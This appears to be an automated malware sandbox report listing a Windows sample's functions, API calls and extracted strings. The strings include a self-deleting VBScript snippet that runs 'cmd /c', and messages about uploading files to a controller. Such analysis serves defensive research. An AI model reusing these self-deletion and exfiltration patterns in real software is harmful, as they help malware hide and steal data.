                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B44D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B460
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B4A4
                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041B4BF
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B4D7
                                                          • _wcslen.LIBCMT ref: 0041B4E6
                                                          • FindVolumeClose.KERNEL32(?), ref: 0041B506
                                                          • GetLastError.KERNEL32 ref: 0041B51E
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B54B
                                                          • lstrcatW.KERNEL32(?,?), ref: 0041B564
                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041B573
                                                          • GetLastError.KERNEL32 ref: 0041B57B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          • Opcode ID: ab6c0a2e820866b083e3708fbad612f297667e297ed8968616fd37775c99846c
                                                          • Instruction ID: f0577cbf519c1fbc76aa3138d797bbd7c283cc622b072e5c2a83b2d98bec9820
                                                          • Opcode Fuzzy Hash: ab6c0a2e820866b083e3708fbad612f297667e297ed8968616fd37775c99846c
                                                          • Instruction Fuzzy Hash: 8441A071504705ABC720DF61E8489EBB7E8EB48705F00482FF541D2262EF78D989CBDA
                                                          Function 0044E41E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
                                                          • Opcode ID: 0e1a8f8bbfaf70a5321281e28d07a2b80f4a7f922fdb1718459ded84c8fb4435
                                                          • Instruction ID: a8aac0df7486383d9a181904d39d16e24afc3d72eb934652fe50c6e09291e228
                                                          • Opcode Fuzzy Hash: 0e1a8f8bbfaf70a5321281e28d07a2b80f4a7f922fdb1718459ded84c8fb4435
                                                          • Instruction Fuzzy Hash: 5DD12771D00310AFFB21AF77888166E7BA4BF01368F45416FF945A7381EA399E418B9D
                                                          Function 00411D59 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411D72
                                                            • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00466324), ref: 004178B2
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32($cF,?,?,00403AB9,00466324), ref: 004178BB
                                                          • Sleep.KERNEL32(0000000A,00466324), ref: 00411EC4
                                                          • Sleep.KERNEL32(0000000A,00466324,00466324), ref: 00411F66
                                                          • Sleep.KERNEL32(0000000A,00466324,00466324,00466324), ref: 00412008
                                                          • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 00412069
                                                          • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 004120A0
                                                          • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 004120DC
                                                          • Sleep.KERNEL32(000001F4,00466324,00466324,00466324), ref: 004120F6
                                                          • Sleep.KERNEL32(00000064), ref: 00412138
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                          • String ID: /stext "$HTG$HTG$NG$NG
                                                          • API String ID: 1223786279-556891652
                                                          • Opcode ID: dc2d48520b73d896eeb902e8487fecec8a65e375c022621813084e4261d1f7f8
                                                          • Instruction ID: b666a026b41db1aee680f36e7b950d376c2ae40a85d54f66cdb5da2431d4b1f1
                                                          • Opcode Fuzzy Hash: dc2d48520b73d896eeb902e8487fecec8a65e375c022621813084e4261d1f7f8
                                                          • Instruction Fuzzy Hash: F00224315083414AD324FB61D891BEFB7D5AFD4308F50493EF88A931E2EF785A49C69A
                                                          Function 0041CCA9 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CCF4
                                                          • GetCursorPos.USER32(?), ref: 0041CD03
                                                          • SetForegroundWindow.USER32(?), ref: 0041CD0C
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CD26
                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B50), ref: 0041CD77
                                                          • ExitProcess.KERNEL32 ref: 0041CD7F
                                                          • CreatePopupMenu.USER32 ref: 0041CD85
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CD9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          • Opcode ID: bed582d39fc96e8479943e4d89b527f8ff9ef20370aed2009df63d45acb158b0
                                                          • Instruction ID: 460fc807693895ecf387abb2373bcbc61375cccb84b7011694e880842115b21a
                                                          • Opcode Fuzzy Hash: bed582d39fc96e8479943e4d89b527f8ff9ef20370aed2009df63d45acb158b0
                                                          • Instruction Fuzzy Hash: F321F831140205EFDB054FA4FD4DBAA3F65EB04702F004539FA0AA41B1DBB6ED91EB59
                                                          Function 0044514D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          • Opcode ID: 39c5139744f4540f523a9af4ed2fa8afb712fe0565144d4bd577e3f50ea1b080
                                                          • Instruction ID: de18a1b700a064f56ed707831433d851a0809218b1b1d193042f08ca5b0df7c8
                                                          • Opcode Fuzzy Hash: 39c5139744f4540f523a9af4ed2fa8afb712fe0565144d4bd577e3f50ea1b080
                                                          • Instruction Fuzzy Hash: 59B190719006059FEF11DF69C881BEEBBF4FF09304F14406EF895AB252DA799C459B24
                                                          Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                          • __aulldiv.LIBCMT ref: 00407FE9
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                          • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                          • API String ID: 1884690901-2582957567
                                                          • Opcode ID: 51cee8c69b7389e8a28f069381dc337d69fe878f182ed45289c66d2e756e5a1e
                                                          • Instruction ID: fe8c5194ffe86d3827a7b181bfbb3d0fd3c62202293e6b84b2d5449ede98e066
                                                          • Opcode Fuzzy Hash: 51cee8c69b7389e8a28f069381dc337d69fe878f182ed45289c66d2e756e5a1e
                                                          • Instruction Fuzzy Hash: 73B182716083409BC614FB25C892BAFB7E5AFD4314F40492EF889632D2EF789945C79B
                                                          Function 00413F0F Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413F5E
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413FA0
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413FC0
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413FC7
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413FFF
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414011
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414018
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414027
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0041403E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                          • String ID: \ws2_32$\wship6$getaddrinfo
                                                          • API String ID: 2490988753-3078833738
                                                          • Opcode ID: a1ebb0e7ad90273c6050595515f5be941597b1bff8e5ee6fc120c50391cee153
                                                          • Instruction ID: be6955175b5ce73d91635d8a52bfbd354ab09fdd92d7e760b1966c561f7cb5d0
                                                          • Opcode Fuzzy Hash: a1ebb0e7ad90273c6050595515f5be941597b1bff8e5ee6fc120c50391cee153
                                                          • Instruction Fuzzy Hash: B33117B280131567D320EF55DC84EDB7BDCAF89745F01092AFA88A3201D73CD98587AE
                                                          Function 0045027D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 004502C1
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F510
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F522
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F534
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F546
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F558
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F56A
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F57C
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F58E
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5A0
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5B2
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5C4
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5D6
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5E8
                                                          • _free.LIBCMT ref: 004502B6
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 004502D8
                                                          • _free.LIBCMT ref: 004502ED
                                                          • _free.LIBCMT ref: 004502F8
                                                          • _free.LIBCMT ref: 0045031A
                                                          • _free.LIBCMT ref: 0045032D
                                                          • _free.LIBCMT ref: 0045033B
                                                          • _free.LIBCMT ref: 00450346
                                                          • _free.LIBCMT ref: 0045037E
                                                          • _free.LIBCMT ref: 00450385
                                                          • _free.LIBCMT ref: 004503A2
                                                          • _free.LIBCMT ref: 004503BA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 0aefceb04b648aea5efd53e91dec8318d050154b6956abd82aee10787160205d
                                                          • Instruction ID: 8d5a52dc196ca223d521196e0170462af54da78aea2ffa7a7b46d1c1532e12ca
                                                          • Opcode Fuzzy Hash: 0aefceb04b648aea5efd53e91dec8318d050154b6956abd82aee10787160205d
                                                          • Instruction Fuzzy Hash: 57316F355003009FEB20AA79D84AB5B73E9EF01365F51445FF88AD7652DF38AC48D719
                                                          Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                            • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                            • Part of subcall function 00412735: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                            • Part of subcall function 00412735: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                            • Part of subcall function 00412735: RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C826
                                                          • ExitProcess.KERNEL32 ref: 0040C832
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$PSG$Temp$exepath$open
                                                          • API String ID: 1913171305-1605470806
                                                          • Opcode ID: e25f8157e9f350052b0f4595ec8701be29ea22bdce4a73478e308fb1e33702c0
                                                          • Instruction ID: 0a59ab1ac2652dc6c4b0de1f1bfb113b457f9f33def171b9a9917dadcc9857af
                                                          • Opcode Fuzzy Hash: e25f8157e9f350052b0f4595ec8701be29ea22bdce4a73478e308fb1e33702c0
                                                          • Instruction Fuzzy Hash: 2E416D329101185ACB14F761DC56DFE7779AF50708F10417FF806B31E2EE786A8ACA98
                                                          Function 0044F5F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: b030283a6c0ce51ba92dd09d555ed862ebb201d4cb761b5ee972a13664eb7e13
                                                          • Instruction ID: 986e8a668492dbee8f9f46891c6c86f5dcf9ebf43b9fca0c5b911ed3811bef24
                                                          • Opcode Fuzzy Hash: b030283a6c0ce51ba92dd09d555ed862ebb201d4cb761b5ee972a13664eb7e13
                                                          • Instruction Fuzzy Hash: 1FC15371D40204BBEB20EAA8CC82FEE77B89B08704F15416AFE45FB282D6749D459768
                                                          Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                          • closesocket.WS2_32(000000FF), ref: 0040481F
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                          • String ID:
                                                          • API String ID: 3658366068-0
                                                          • Opcode ID: 0962e5985aceae85a5c94cde7029e24ad356a8ace8c6bfbca5ef33fdb60659b2
                                                          • Instruction ID: bab6184e8302d1d457a53eef1949a11c31841f7ba2aeead181e9cd14b25d2afd
                                                          • Opcode Fuzzy Hash: 0962e5985aceae85a5c94cde7029e24ad356a8ace8c6bfbca5ef33fdb60659b2
                                                          • Instruction Fuzzy Hash: 21212C71100F149FC6216B26DC05A17BBE1EF40325F104A6EE2A622AF2CF35F851DB4C
                                                          Function 00454B92 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00454860: CreateFileW.KERNEL32(00000000,?,?,;LE,?,?,00000000,?,00454C3B,00000000,0000000C), ref: 0045487D
                                                          • GetLastError.KERNEL32 ref: 00454CA6
                                                          • __dosmaperr.LIBCMT ref: 00454CAD
                                                          • GetFileType.KERNEL32(00000000), ref: 00454CB9
                                                          • GetLastError.KERNEL32 ref: 00454CC3
                                                          • __dosmaperr.LIBCMT ref: 00454CCC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00454CEC
                                                          • CloseHandle.KERNEL32(?), ref: 00454E36
                                                          • GetLastError.KERNEL32 ref: 00454E68
                                                          • __dosmaperr.LIBCMT ref: 00454E6F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: 7241ecee4a5f1f89fc763009d89c6ec11b2c57897b1f7dc41199f6beedf99759
                                                          • Instruction ID: a1ee14646c220e05fb339a94c39d658440f80e8cb8884f5184f0ba1168eb6fd8
                                                          • Opcode Fuzzy Hash: 7241ecee4a5f1f89fc763009d89c6ec11b2c57897b1f7dc41199f6beedf99759
                                                          • Instruction Fuzzy Hash: EBA126319045489FDF19DF68D8427AE7BB1EB46329F14015EEC01AF392CB398896CB5A
                                                          Function 0041931E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 174sleeptimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00419323
                                                          • GdiplusStartup.GDIPLUS(00474AF4,?,00000000), ref: 00419355
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004193E1
                                                          • Sleep.KERNEL32(000003E8), ref: 00419463
